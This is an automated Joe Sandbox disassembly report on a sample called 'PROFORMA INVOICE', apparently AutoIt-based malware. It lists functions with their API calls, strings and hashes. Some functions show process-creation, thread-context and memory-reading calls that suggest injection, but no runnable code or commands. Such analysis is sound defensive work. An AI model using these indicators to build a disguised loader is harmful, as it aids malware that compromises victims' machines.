Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: d119c110cda0666ffdc40166c017e46626f99e75f4f10a9185066438cc4836ee
Instruction ID: a10f5ae4f24aeee540b10b47c174f6213d20982763e5d32cc061526097e9131d
Opcode Fuzzy Hash: d119c110cda0666ffdc40166c017e46626f99e75f4f10a9185066438cc4836ee
Instruction Fuzzy Hash: DF2117B5D0034CAFDB20DFA4E889BCDBBB5FB08700F10421AF651AA694D7BA4544DF91

Function 00FABFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FABDB4: __time64.LIBCMT ref: 00FABDBE

Part of subcall function 00F64517: _fseek.LIBCMT ref: 00F6452F

__wsplitpath.LIBCMT ref: 00FAC083

Part of subcall function 00F81DFC: __wsplitpath_helper.LIBCMT ref: 00F81E3C

_wcscpy.LIBCMT ref: 00FAC096
_wcscat.LIBCMT ref: 00FAC0A9
__wsplitpath.LIBCMT ref: 00FAC0CE
_wcscat.LIBCMT ref: 00FAC0E4
_wcscat.LIBCMT ref: 00FAC0F7
_wcscmp.LIBCMT ref: 00FAC03E

Part of subcall function 00FAC56D: _wcscmp.LIBCMT ref: 00FAC65D
Part of subcall function 00FAC56D: _wcscmp.LIBCMT ref: 00FAC670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FAC2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FAC338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FAC34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FAC35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FAC371

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: f7c6c6525d08d4b8556f6d3efbcccbc548f83718e52966c845e851211ea345ff
Instruction ID: 8656d5472fc765293b591f40ca42702ba4df48247d7d33f147dd25d597d52418
Opcode Fuzzy Hash: f7c6c6525d08d4b8556f6d3efbcccbc548f83718e52966c845e851211ea345ff
Instruction Fuzzy Hash: 35C10CB2E00219AFDF11EF95CC81EDEB7BDAF49310F1040AAF609E6151DB749A449F61

Function 00F63742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00F637B3
KillTimer.USER32(?,00000001), ref: 00F637DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F63800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F6380B
CreatePopupMenu.USER32 ref: 00F6381F
PostQuitMessage.USER32(00000000), ref: 00F6382E

Strings

TaskbarCreated, xrefs: 00F63806

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 123871b7b346fae81e0d3f654d9b5bbc18138f270fed7f3e274f912964668fdb
Instruction ID: 1199359f8a2c50eb9449339eec07979d71365ba2759636a1aca8af0bb5895038
Opcode Fuzzy Hash: 123871b7b346fae81e0d3f654d9b5bbc18138f270fed7f3e274f912964668fdb
Instruction Fuzzy Hash: 42415EF260819DABDB345F68DC8AF793766F744310F14012AF942D7191CB79AE10B762

Function 00F63E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F63E79
LoadCursorW.USER32(00000000,00007F00), ref: 00F63E88
LoadIconW.USER32(00000063), ref: 00F63E9E
LoadIconW.USER32(000000A4), ref: 00F63EB0
LoadIconW.USER32(000000A2), ref: 00F63EC2

Part of subcall function 00F64024: LoadImageW.USER32(00F60000,00000063,00000001,00000010,00000010,00000000), ref: 00F64048

RegisterClassExW.USER32(?), ref: 00F63F30

Part of subcall function 00F63F53: GetSysColorBrush.USER32(0000000F), ref: 00F63F86
Part of subcall function 00F63F53: RegisterClassExW.USER32(00000030), ref: 00F63FB0
Part of subcall function 00F63F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F63FC1
Part of subcall function 00F63F53: InitCommonControlsEx.COMCTL32(?), ref: 00F63FDE
Part of subcall function 00F63F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F63FEE
Part of subcall function 00F63F53: LoadIconW.USER32(000000A9), ref: 00F64004
Part of subcall function 00F63F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F64013

Strings

#, xrefs: 00F63F09
AutoIt v3, xrefs: 00F63F1F
0, xrefs: 00F63F02

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 1d9b55d229bb79a74b89c6979f8fb2216628058600887106673f8d6b627c09f1
Instruction ID: 95af561d6859ecbd756cae06a84556a3da4c78b73cf053f1b5bae2f5d98e97df
Opcode Fuzzy Hash: 1d9b55d229bb79a74b89c6979f8fb2216628058600887106673f8d6b627c09f1
Instruction Fuzzy Hash: 8F2165B0E04304AFCB30DFA9EC45A99BFF5FB48314F20412AE248A7294D37A46009F95

Function 00F8ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 00F8ACC1

Part of subcall function 00F87CF4: __mtinitlocknum.LIBCMT ref: 00F87D06
Part of subcall function 00F87CF4: EnterCriticalSection.KERNEL32(00000000,?,00F87ADD,0000000D), ref: 00F87D1F

__calloc_crt.LIBCMT ref: 00F8ACD2

Part of subcall function 00F86986: __calloc_impl.LIBCMT ref: 00F86995
Part of subcall function 00F86986: Sleep.KERNEL32(00000000,000003BC,00F7F507,?,0000000E), ref: 00F869AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 00F8ACED
GetStartupInfoW.KERNEL32(?,01016E28,00000064,00F85E91,01016C70,00000014), ref: 00F8AD46
__calloc_crt.LIBCMT ref: 00F8AD91
GetFileType.KERNEL32(00000001), ref: 00F8ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00F8AE11

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 2d0393f338f98789d31996634c709189ec00f2690e8bca045a91caa0fbdbcde7
Instruction ID: 5f9a1134d6859c4c9c21d81b03cfe83467a54c3084fde6d1d1ca886385d28549
Opcode Fuzzy Hash: 2d0393f338f98789d31996634c709189ec00f2690e8bca045a91caa0fbdbcde7
Instruction Fuzzy Hash: EC81D171E013458FEB24DF68C8805E9BBF0EF06320B24465EE4A6AB3D1D7399803EB51

Function 017DD240 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017DD311
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017DD537

Memory Dump Source

Source File: 00000000.00000002.1705514040.00000000017DA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17da000_PROFORMA INVOICE.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction ID: f71e7007c094a92000d628471e1565c477d60e7a46d5a0c046a9815badad1f37
Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction Fuzzy Hash: C7A1D774E00209EBDB24CFE4C994BEEFBB5BF48304F208599E605AB281D775AA41CB55

Function 00F649FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00F64A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FD41DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FD421A
RegCloseKey.ADVAPI32(?), ref: 00FD4249

Strings

Include, xrefs: 00FD41D3, 00FD4212
Software\AutoIt v3\AutoIt, xrefs: 00F64A13

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: e0e3ffeb408599f6aa036abe4b6096ae9c52aa72d7c66d267beb10fd181b32a7
Instruction ID: 71fefcdee063e46dfe5527d1fcf9e8b3ce1e8b21c1610c28fb33323b027ac262
Opcode Fuzzy Hash: e0e3ffeb408599f6aa036abe4b6096ae9c52aa72d7c66d267beb10fd181b32a7
Instruction Fuzzy Hash: FD112971A0010DBFEB04EBA4CD86DBF7BACEF04354F144069B606E61A1EA74AE41AA50

Function 00F636B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F636E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F63707
ShowWindow.USER32(00000000,?,?,?,?,00F63AA3,?), ref: 00F6371B
ShowWindow.USER32(00000000,?,?,?,?,00F63AA3,?), ref: 00F63724

Strings

AutoIt v3, xrefs: 00F636DE, 00F636E3, 00F636E4
edit, xrefs: 00F63701

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 0e7075cafded3a2dc3d52f70b96d1ed90d5f85fdb41fa937e558f0883515ef7a
Instruction ID: a35573839b81579d19d807b010c3d8746620db92367220382fd36fdfe92fd7e5
Opcode Fuzzy Hash: 0e7075cafded3a2dc3d52f70b96d1ed90d5f85fdb41fa937e558f0883515ef7a
Instruction Fuzzy Hash: 22F03A706402D47AE7305B57AC88E773E7ED7C6F20B10002AFA04A61A4C1BE0841DBB4

Function 017DD030 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017DCF20: Sleep.KERNELBASE(000001F4), ref: 017DCF31

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017DD12B

Strings

AR65OHRS0MP, xrefs: 017DD18E, 017DD191

Memory Dump Source

Source File: 00000000.00000002.1705514040.00000000017DA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17da000_PROFORMA INVOICE.jbxd

Similarity

API ID: CreateFileSleep
String ID: AR65OHRS0MP
API String ID: 2694422964-2438132141
Opcode ID: 1e1e61ea8f8895036c1f2ca9a852b5ff88f5e68dd9c996ba5ef8fe2090b476ea
Instruction ID: 6ed21862cb0d35622511dcec388d81b272649ac65466f3469c5fb11414d99119
Opcode Fuzzy Hash: 1e1e61ea8f8895036c1f2ca9a852b5ff88f5e68dd9c996ba5ef8fe2090b476ea
Instruction Fuzzy Hash: D9514C31D0420DABEB21DBB4C818BEEBB79EF19300F004599E619BB2C1D6795B45CBA5

Function 00F651AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F6522F
_wcscpy.LIBCMT ref: 00F65283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F65293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FD3CB0

Strings

Line: , xrefs: 00FD3CD9

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 86eebe3279ace562ef873701c159bd20de5dc29ca3d8cd234bb74030e4be8f7c
Instruction ID: 29317e4d454c5f1467cd249b8c22830a5bde220d12ae528d2fa71e98d4cc8c8a
Opcode Fuzzy Hash: 86eebe3279ace562ef873701c159bd20de5dc29ca3d8cd234bb74030e4be8f7c
Instruction Fuzzy Hash: A931AF71508750AED330EB60DC42FDE77D8AB85710F10461EF5C9A6191EBB8A608EB96

Function 00F64139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 00F641A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00F639FE,?,00000001), ref: 00F641DB

_free.LIBCMT ref: 00FD36B7
_free.LIBCMT ref: 00FD36FE

Part of subcall function 00F6C833: __wsplitpath.LIBCMT ref: 00F6C93E
Part of subcall function 00F6C833: _wcscpy.LIBCMT ref: 00F6C953
Part of subcall function 00F6C833: _wcscat.LIBCMT ref: 00F6C968
Part of subcall function 00F6C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00F6C978

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00FD3491
Bad directive syntax error, xrefs: 00FD36E4

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 4de45405d2fc43324ecb008c3bbedac90bfe4488c283282f3aee5b33c13acbc8
Instruction ID: 17c6fafa4d2e6884c308f6f0a59abc150b50c68359a8160d1036e72d2203ebbd
Opcode Fuzzy Hash: 4de45405d2fc43324ecb008c3bbedac90bfe4488c283282f3aee5b33c13acbc8
Instruction Fuzzy Hash: A6918171910219AFCF04EFA4CC519EDB7B5BF19310F14402AF516AB291DB78EA44EB91

Function 00F64A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00F65374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01021148,?,00F661FF,?,00000000,00000001,00000000), ref: 00F65392

Part of subcall function 00F649FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00F64A1D

_wcscat.LIBCMT ref: 00FD2D80
_wcscat.LIBCMT ref: 00FD2DB5

Strings

\, xrefs: 00FD2DA2
\Include\, xrefs: 00F64B0A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: 3509aae0984f6be7d93d30a4dfb1e6310b6f31275ad1b5d342fd3e699d23aacd
Instruction ID: 405a769b2416ef48714cd27da6577cef0385ff77f3eea39d5e05c78489edb861
Opcode Fuzzy Hash: 3509aae0984f6be7d93d30a4dfb1e6310b6f31275ad1b5d342fd3e699d23aacd
Instruction Fuzzy Hash: 415183794043408FC334EF95D882CAAB7F5BFA9300BA0052EF6C8D3255DB799648DB52

Function 00F834AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 00F834FE

Part of subcall function 00F87C0E: __getptd_noexit.LIBCMT ref: 00F87C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00F83539
__wopenfile.LIBCMT ref: 00F83549

Strings

<G, xrefs: 00F834CD, 00F834F0, 00F834FC

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: d2d4de4632a6a2017d2f38f2dd5687b208ac233a12fe13d7e87ea93b929bdd74
Instruction ID: daaa7615b7be411b58e783a7605ad2cb6e07e6ec8f4bfee5f9a3944c871f2b61
Opcode Fuzzy Hash: d2d4de4632a6a2017d2f38f2dd5687b208ac233a12fe13d7e87ea93b929bdd74
Instruction Fuzzy Hash: 9C110A71E003069BDB22FF708C427EE36A4AF45B60B188425E415CB1A1EB78CA01B7A1

Function 00F7D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F7D28B,SwapMouseButtons,00000004,?), ref: 00F7D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F7D28B,SwapMouseButtons,00000004,?,?,?,?,00F7C865), ref: 00F7D2DD
RegCloseKey.KERNELBASE(00000000,?,?,00F7D28B,SwapMouseButtons,00000004,?,?,?,?,00F7C865), ref: 00F7D2FF

Strings

Control Panel\Mouse, xrefs: 00F7D2BA

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 840b2452ded14c24fa5ee459730737def09365a739541cb4957f5d45e360fcae
Instruction ID: bcd15419480f203cf755845a7251d4fe7884b9168232b80da0bee01c8f5cdff7
Opcode Fuzzy Hash: 840b2452ded14c24fa5ee459730737def09365a739541cb4957f5d45e360fcae
Instruction Fuzzy Hash: 95113C75A11208BFDB508FA8DC84EAF7BBCEF44754F50846AE909D7110D6319E41AB61

Function 017DBF20 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 017DC6DB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017DC771
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017DC793

Memory Dump Source

Source File: 00000000.00000002.1705514040.00000000017DA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17da000_PROFORMA INVOICE.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction ID: 90b0c18525e8ef45b1f248796c473a07e58d783573734bbcf4eb2b86dc8cc89a
Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction Fuzzy Hash: BC620B30A14258DBEB24CFA4C851BDEB776EF58300F1091A9D20DEB394E7769E81CB59

Function 00FAC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00F64517: _fseek.LIBCMT ref: 00F6452F

Part of subcall function 00FAC56D: _wcscmp.LIBCMT ref: 00FAC65D
Part of subcall function 00FAC56D: _wcscmp.LIBCMT ref: 00FAC670

_free.LIBCMT ref: 00FAC4DD
_free.LIBCMT ref: 00FAC4E4
_free.LIBCMT ref: 00FAC54F

Part of subcall function 00F81C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00F87A85), ref: 00F81CB1
Part of subcall function 00F81C9D: GetLastError.KERNEL32(00000000,?,00F87A85), ref: 00F81CC3

_free.LIBCMT ref: 00FAC557

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction ID: 220ea652057096439adc08b4e05e69b1b1b8a518b3679e95c169521e624131ec
